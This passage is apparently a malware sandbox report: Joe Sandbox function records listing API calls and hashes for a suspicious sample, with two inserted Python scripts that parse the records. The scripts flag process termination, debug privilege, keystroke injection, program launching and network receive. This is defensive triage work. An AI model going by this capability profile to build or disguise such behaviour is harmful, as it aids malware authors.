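    """Resolve '#17'-style ordinal imports from wsock32/ws2_32 to a symbol."""
    if name.startswith("#") and module.upper() in ("WSOCK32", "WS2_32"):
        return WSOCK32_ORDINALS.get(int(name[1:]), name)
    return name


def parse_records(text):
    """Return one dict per function record: calls, strings, similarity."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":            # every function record opens with APIs
                current = {"calls": [], "strings": [], "similarity": {}}
                records.append(current)
            section = line
        elif current is None:
            continue
        elif section == "APIs":
            m = API_RE.match(line)
            if m:                         # subcall APIs are kept: they run too
                current["calls"].append({"name": normalize_api(m["name"], m["module"]),
                                         "module": m["module"], "args": m["args"] or "",
                                         "ref": m["ref"], "caller": m["caller"]})
        elif section == "Strings":
            value, sep, xref = line.rpartition(", xrefs: ")
            current["strings"].append((value, xref) if sep else (line, ""))
        elif section == "Similarity":
            key, _, value = line.partition(":")
            current["similarity"][key.strip()] = value.strip()
    return records


def api_names(rec):
    return {c["name"] for c in rec["calls"]}


def first_ref(rec):
    """Lowest call-site address inside the function itself (not a subcall)."""
    direct = [c["ref"] for c in rec["calls"] if c["caller"] is None]
    return min(direct or [c["ref"] for c in rec["calls"]], default="")


# Capability rules: (tag, predicate over a record).  Tag names are this example's own.
RULES = [
    ("process-enumeration", lambda r: {"CreateToolhelp32Snapshot", "Process32FirstW"} <= api_names(r)),
    ("process-termination", lambda r: {"OpenProcess", "TerminateProcess"} <= api_names(r)),
    ("debug-privilege-string", lambda r: "SeDebugPrivilege" in r["similarity"].get("String ID", "").split("$")),
    ("network-receive", lambda r: bool({"recv", "recvfrom"} & api_names(r))),
    ("remote-registry", lambda r: "RegConnectRegistryW" in api_names(r)),
]


def triage(text):
    """Map the first call-site address of each flagged record to its tags."""
    out = {}
    for rec in parse_records(text):
        tags = [tag for tag, pred in RULES if pred(rec)]
        if tags:
            out[first_ref(rec)] = tags
    return out


# Constructed sample: two records from this listing, Memory Dump Source trimmed.
SAMPLE = """\
APIs
  • Part of subcall function 007F6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F6554
  • Part of subcall function 007F6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 007F6564
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0081179A
• GetLastError.KERNEL32 ref: 008117AD
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00811855
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
APIs
• select.WSOCK32 ref: 00809691
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008096E9
• inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0084DC00), ref: 00809765
Similarity
• API ID: ErrorLast_strlen$htonsinet_ntoaselect
• String ID:
"""
```

Running `triage(SAMPLE)` returns `{'0081179A': ['process-enumeration', 'process-termination', 'debug-privilege-string'], '00809691': ['network-receive']}`. Pointed at the full listing, the same rules reduce hundreds of records to the few whose call-site addresses are worth opening in the disassembler; the remaining records in this section (list-view and font setup, SafeArray handling, CRT lock initialisation) match no rule and are left alone.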
                                                                              APIs
                                                                              • __mtinitlocknum.LIBCMT ref: 007DA991
                                                                                • Part of subcall function 007D7D7C: __FF_MSGBANNER.LIBCMT ref: 007D7D91
                                                                                • Part of subcall function 007D7D7C: __NMSG_WRITE.LIBCMT ref: 007D7D98
                                                                                • Part of subcall function 007D7D7C: __malloc_crt.LIBCMT ref: 007D7DB8
                                                                              • __lock.LIBCMT ref: 007DA9A4
                                                                              • __lock.LIBCMT ref: 007DA9F0
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00866DE0,00000018,007E5E7B,?,00000000,00000109), ref: 007DAA0C
                                                                              • EnterCriticalSection.KERNEL32(8000000C,00866DE0,00000018,007E5E7B,?,00000000,00000109), ref: 007DAA29
                                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 007DAA39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1422805418-0
                                                                              • Opcode ID: bd2353c1633a8ce890587394d99482302988f8c2c3521fccd10fd9d361b41c40
                                                                              • Instruction ID: dbda6fe23c50aecf26010c8bfda2e5e63b60f4cad5a7e5727a3a78a3980302b4
                                                                              • Opcode Fuzzy Hash: bd2353c1633a8ce890587394d99482302988f8c2c3521fccd10fd9d361b41c40
                                                                              • Instruction Fuzzy Hash: 10410771900206EBEB149F68DA48759BBB0BF41325F10831BE529AB3D1DB7C9D51CB92
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00818EE4
                                                                              • GetDC.USER32(00000000), ref: 00818EEC
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00818EF7
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00818F03
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00818F3F
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00818F50
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0081BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00818F8A
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00818FAA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              • Opcode ID: 324cf4629fb0a28e743815ce389522eadacdcc69ffc8076c09d15ffae23988f6
                                                                              • Instruction ID: 151f0b98430663fe8f0c99c7d9146b030bda1091a0d7bbf9a739e13da8e8dffc
                                                                              • Opcode Fuzzy Hash: 324cf4629fb0a28e743815ce389522eadacdcc69ffc8076c09d15ffae23988f6
                                                                              • Instruction Fuzzy Hash: 54317C72200614BFEB108F50DC8AFEA3BADFF89715F044065FE08DA191DAB59842CBB0
                                                                              APIs
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                                • Part of subcall function 007CC6F4: _wcscpy.LIBCMT ref: 007CC717
                                                                              • _wcstok.LIBCMT ref: 0080184E
                                                                              • _wcscpy.LIBCMT ref: 008018DD
                                                                              • _memset.LIBCMT ref: 00801910
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                              • String ID: X
                                                                              • API String ID: 774024439-3081909835
                                                                              • Opcode ID: a206eee01cc31d102495ddc3cbf3f9b5838d0dd9c511f8ced021f615ba329ee3
                                                                              • Instruction ID: 3ab8b1fa169bf9123115691bfb138c1e1e757d51a48c07d50fc7044869f35c31
                                                                              • Opcode Fuzzy Hash: a206eee01cc31d102495ddc3cbf3f9b5838d0dd9c511f8ced021f615ba329ee3
                                                                              • Instruction Fuzzy Hash: D6C15831604344DFC764EF24C989B9AB7E4FF85350F04892DF999972A2DB34E904CB82
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0082016D
                                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0082038D
                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008203AB
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 008203D6
                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008203FF
                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00820421
                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00820440
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                              • String ID:
                                                                              • API String ID: 3356174886-0
                                                                              • Opcode ID: 5fb6f01de9a3bdb2754c22fcb940c220ed9e0636de1d98f16838c5379e98f4dd
                                                                              • Instruction ID: b2b2f421a1a325993eb6e6f709cce24de1fe499da8826ae1a5da549c457370f9
                                                                              • Opcode Fuzzy Hash: 5fb6f01de9a3bdb2754c22fcb940c220ed9e0636de1d98f16838c5379e98f4dd
                                                                              • Instruction Fuzzy Hash: 54A1AE3560062AEFDB18CF68D9897ADBBB1FF44704F148115E854EB296D734ADA0CF90
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 196ec45403647516f2b4a09f68df960a1cab7b551d235e3c2910f57837e42af3
                                                                              • Instruction ID: fc875cdf5ac7d33401160f572118806f6f9a9e486261ccdd71a395ad18939fcf
                                                                              • Opcode Fuzzy Hash: 196ec45403647516f2b4a09f68df960a1cab7b551d235e3c2910f57837e42af3
                                                                              • Instruction Fuzzy Hash: 7E7169B0900509FFCB04CF98CC89EAEBB78FF85315F24815DF915AA251C734AA51CBA5
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0081225A
                                                                              • _memset.LIBCMT ref: 00812323
                                                                              • ShellExecuteExW.SHELL32(?), ref: 00812368
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                                • Part of subcall function 007CC6F4: _wcscpy.LIBCMT ref: 007CC717
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0081242F
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0081243E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                              • String ID: @
                                                                              • API String ID: 4082843840-2766056989
                                                                              • Opcode ID: 4df93a5cbe462531cb2ab8de638fce24d0eebd9f883883d99ecc5159a252c0d4
                                                                              • Instruction ID: efaae6d6edfb72ce20a8557b36c931f3b77dcce474010291a443eadba39afa8c
                                                                              • Opcode Fuzzy Hash: 4df93a5cbe462531cb2ab8de638fce24d0eebd9f883883d99ecc5159a252c0d4
                                                                              • Instruction Fuzzy Hash: 42715970A00619DFCB15EFA4C885AAEB7F9FF48310F108459E959AB361DB38AD50CB94
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 007F3DE7
                                                                              • GetKeyboardState.USER32(?), ref: 007F3DFC
                                                                              • SetKeyboardState.USER32(?), ref: 007F3E5D
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 007F3E8B
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 007F3EAA
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 007F3EF0
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007F3F13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: 66424dd1888c8675065a7c5bd35b7b93924693cc0e86142a27619d9ef1ec6c4d
                                                                              • Instruction ID: bc9e3adb61bec6d6a4b0cce00fba340cdc7bc38676a6b59e06a417b91f22ff1c
                                                                              • Opcode Fuzzy Hash: 66424dd1888c8675065a7c5bd35b7b93924693cc0e86142a27619d9ef1ec6c4d
                                                                              • Instruction Fuzzy Hash: 0F51B3A0A047D93DFB364734CC45BBA7EA96F46304F084589F2D5969C3D29CAEC8D760
                                                                              APIs
                                                                              • GetParent.USER32(00000000), ref: 007F3C02
                                                                              • GetKeyboardState.USER32(?), ref: 007F3C17
                                                                              • SetKeyboardState.USER32(?), ref: 007F3C78
                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007F3CA4
                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007F3CC1
                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007F3D05
                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007F3D26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: 477ee3f32d9d9128d3d872f48ebcab8456f6babced80a696fb0a0cff206b3e28
                                                                              • Instruction ID: 4b0c5edcc6c5346f12886cd9dd580247861336de6eecee3185a63c39a2efc445
                                                                              • Opcode Fuzzy Hash: 477ee3f32d9d9128d3d872f48ebcab8456f6babced80a696fb0a0cff206b3e28
                                                                              • Instruction Fuzzy Hash: F55109A06047DD3DFB368374CC55B76BFA96B46300F088489E2D55A6C3D29CEE84E760
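The two records above list raw API calls with hex arguments: PostMessageW with message 0x100/0x101 (WM_KEYDOWN/WM_KEYUP) and wParam 0x10, 0x11, 0x12 and 0x5B (VK_SHIFT, VK_CONTROL, VK_MENU, VK_LWIN), bracketed by GetKeyboardState/SetKeyboardState, and a few records earlier a ShellExecuteExW call. The script below is an added example written by the editor; it is not part of the Joe Sandbox report and not code from the sample. It parses the report's "APIs" lines into structured records and decodes the Win32 constants the editor is certain of, so a triage pass over thousands of such records can surface synthetic-keystroke injection and process-launching calls without decoding hex by hand. The sample record is assembled from lines in this section; the decode tables, the list of flagged APIs, and the reading of 000000F0/000000EB as the low byte of the negative GWL_STYLE/GWL_USERDATA indexes are the editor's assumptions.

```python
"""Parse the "APIs" lines of Joe Sandbox function records and decode the
Win32 constants that appear in them, so records can be triaged without
hand-decoding every hex argument.

Added example, not part of the report. The sample record below is
assembled from lines in this section; the decode tables and the list of
APIs flagged for review are the editor's own choices (assumption)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Matches both line shapes found in the report:
#   "• PostMessageW.USER32(?,00000101,00000010,?), ref: 007F3E8B"
#   "  • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

WINDOW_MESSAGES = {
    0x0030: "WM_SETFONT",
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    # Button-control messages; only meaningful when the target is a button.
    0x00F0: "BM_GETCHECK",
    0x00F1: "BM_SETCHECK",
}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
# GetWindowLong indexes are negative (GWL_STYLE = -16, GWL_USERDATA = -21); the
# dump renders them as 000000F0 / 000000EB (assumption: low byte of the immediate).
WINDOW_LONG_INDEX = {0xF0: "GWL_STYLE", 0xEB: "GWL_USERDATA"}
# APIs worth a second look in a sandboxed sample (editor's list, not the report's).
FLAGGED = {
    "ShellExecuteExW": "launches a program or opens a document",
    "SetKeyboardState": "rewrites the calling thread's key state",
    "PostMessageW": "injects synthetic keystrokes when paired with WM_KEY* messages",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]  # int for hex literals, None for '?'
    ref: int                   # call-site address from the dump
    subcall: bool              # reached via a callee rather than directly


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for one dump line, or None if it is not an API line."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args") or ""
    args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")] if raw else []
    return ApiCall(m.group("name"), m.group("module"), args,
                   int(m.group("ref"), 16), bool(m.group("sub")))


def parse_record(text: str) -> List[ApiCall]:
    """Parse every API line of one function record, skipping everything else."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def describe(call: ApiCall) -> str:
    """Render a call with decoded constants, e.g. 'PostMessageW(WM_KEYUP, VK_SHIFT) @ 007F3E8B'."""
    a, decoded = call.args, []
    if call.name in ("SendMessageW", "PostMessageW") and len(a) >= 3 and a[1] in WINDOW_MESSAGES:
        decoded.append(WINDOW_MESSAGES[a[1]])
        if decoded[0] in ("WM_KEYDOWN", "WM_KEYUP") and a[2] in VIRTUAL_KEYS:
            decoded.append(VIRTUAL_KEYS[a[2]])
    elif call.name in ("GetWindowLongW", "SetWindowLongW") and len(a) >= 2 and a[1] in WINDOW_LONG_INDEX:
        decoded.append(WINDOW_LONG_INDEX[a[1]])
    inner = ", ".join(decoded) if decoded else ", ".join("?" if x is None else f"0x{x:X}" for x in a)
    return f"{call.name}({inner}) @ {call.ref:08X}"


def synthetic_key_events(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """(message, virtual key) for every WM_KEYDOWN/WM_KEYUP posted by the record."""
    out = []
    for c in calls:
        if c.name == "PostMessageW" and len(c.args) >= 3 and c.args[1] in (0x100, 0x101):
            vk = c.args[2]
            out.append((WINDOW_MESSAGES[c.args[1]], VIRTUAL_KEYS.get(vk, "?" if vk is None else f"VK_0x{vk:02X}")))
    return out


def flagged_apis(calls: List[ApiCall]) -> List[str]:
    """Distinct flagged API names in first-seen order."""
    seen: List[str] = []
    for c in calls:
        if c.name in FLAGGED and c.name not in seen:
            seen.append(c.name)
    return seen


# Constructed from lines in this section of the report (two records merged).
SAMPLE_RECORD = """\
• GetParent.USER32(?), ref: 007F3DE7
• GetKeyboardState.USER32(?), ref: 007F3DFC
• SetKeyboardState.USER32(?), ref: 007F3E5D
• PostMessageW.USER32(?,00000101,00000010,?), ref: 007F3E8B
• PostMessageW.USER32(?,00000101,00000011,?), ref: 007F3EAA
• PostMessageW.USER32(?,00000101,00000012,?), ref: 007F3EF0
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 007F3F13
  • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
• ShellExecuteExW.SHELL32(?), ref: 00812368
"""

if __name__ == "__main__":
    calls = parse_record(SAMPLE_RECORD)
    for call in calls:
        print(describe(call))
    print("synthetic keys:", synthetic_key_events(calls))
    print("flagged:", {n: FLAGGED[n] for n in flagged_apis(calls)})
```

Feed whole report records through `parse_record` and keep the ones where `synthetic_key_events` or `flagged_apis` is non-empty; that separates the handful of records that touch input injection or process creation from the GUI and string-handling boilerplate that makes up most of this dump. Control-specific messages (BM_*, CB_*) reuse numeric ranges, so the decoder only names the ones whose meaning does not depend on the target window class beyond what the record shows.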
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsncpy$LocalTime
                                                                              • String ID:
                                                                              • API String ID: 2945705084-0
                                                                              • Opcode ID: 7568fd6ef714ee1256c00937e49ae473687ee5ac10ae54e47f1d4d03cd4b0f3c
                                                                              • Instruction ID: 4cc45c12dd9af0023ed3c6a593107c46beb9edce773a19868d782b71acaa45c1
                                                                              • Opcode Fuzzy Hash: 7568fd6ef714ee1256c00937e49ae473687ee5ac10ae54e47f1d4d03cd4b0f3c
                                                                              • Instruction Fuzzy Hash: 6D414366D14218B6DB10EBF4884AADF77BCAF15310F544967E508E3222FA38D615C3B5
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00818FE7
                                                                              • GetWindowLongW.USER32(00CFDBA8,000000F0), ref: 0081901A
                                                                              • GetWindowLongW.USER32(00CFDBA8,000000F0), ref: 0081904F
                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00819081
                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008190AB
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 008190BC
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008190D6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 2178440468-0
                                                                              • Opcode ID: 4fd1500215774e2b3a6b004bddd0b7da530a4716fa59279f701c5e74f9dbf1d5
                                                                              • Instruction ID: 38c52d786d02fc23ea6270dc3cd9b35b289ee2af75e14797f1ef61742d01e14b
                                                                              • Opcode Fuzzy Hash: 4fd1500215774e2b3a6b004bddd0b7da530a4716fa59279f701c5e74f9dbf1d5
                                                                              • Instruction Fuzzy Hash: CF3123746006149FDB20CF58EC99FA437A9FBAA714F140168F559CB2B2CB71A880DB81
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F08F2
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F0918
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 007F091B
                                                                              • SysAllocString.OLEAUT32(?), ref: 007F0939
                                                                              • SysFreeString.OLEAUT32(?), ref: 007F0942
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 007F0967
                                                                              • SysAllocString.OLEAUT32(?), ref: 007F0975
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
